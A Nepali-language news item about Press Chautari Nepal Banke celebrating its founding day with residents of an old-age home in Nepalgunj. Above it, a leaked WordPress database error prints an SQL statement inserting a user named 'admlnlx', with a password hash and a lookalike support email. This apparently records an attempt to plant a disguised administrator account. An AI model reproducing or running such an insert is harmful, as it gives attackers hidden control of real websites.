WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNWis3A35Vsvdm0jBOdJOZtfsu/WD61', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 17:08:00', '', 'admlnlx', 'admlnlx')
नेपालगन्ज,माघ २२-
प्रेस चौतारी नेपाल बाँकेले नेपालगन्जस्थित नीलसागर वृद्धाश्रममा रहेका वृद्धवृद्धासँग शनिवार स्थापना दिवस मनाएको छ ।
वृद्धाश्रममा रहेका १४ जना वृद्धवृद्धालाई फलफूल वितरण गर्दै प्रेस चौतारी आवद्ध पत्रकारहरुले वृद्धवृद्धाका समस्या समाधान गर्नको लागि पहल गर्ने बताए । वृद्धाश्रमकी अध्यक्ष सरिता खनालले वृद्धाश्रममा आएर स्थापना दिवस मनाएकोमा धन्यवाद व्यक्त गरिन् ।
प्रेस चौतारी बाँकेका अध्यक्ष हेमन्त बि.क.को अध्यक्षतामा भएको कार्यक्रममा प्रमुख अतिथि एमाले केन्द्रीय प्रचार विभाग सदस्य डिल्ली बि.सी., प्रेस चौतारी नेपाल केन्द्रीय अनुशासन आयोग अध्यक्ष जे. पाण्डे, केन्द्रीय सदस्य भेषराज बस्नेत, पूर्व केन्द्रीय उपाध्यक्ष शिव डोटेल, नेपाल पत्रकार महासंघका केन्द्रीय सदस्य झलक गैरे लगायतले बोलेका थिए ।
स्थापना दिवसको अवसरमा साताव्यापी कार्यक्रम तयर गरेको प्रेस चौतारी बाँकेले आईतवार विहान नेपालगन्ज रंगशालामा मध्यपश्चिम क्षेत्रीय खेलकुद विकास समितिका पदाधिकारी, कर्मचारीसँग मैत्रीपूर्ण फुटबल खेल आयोजना गरेको सचिव कमल डाँगीले जानकारी दिए ।
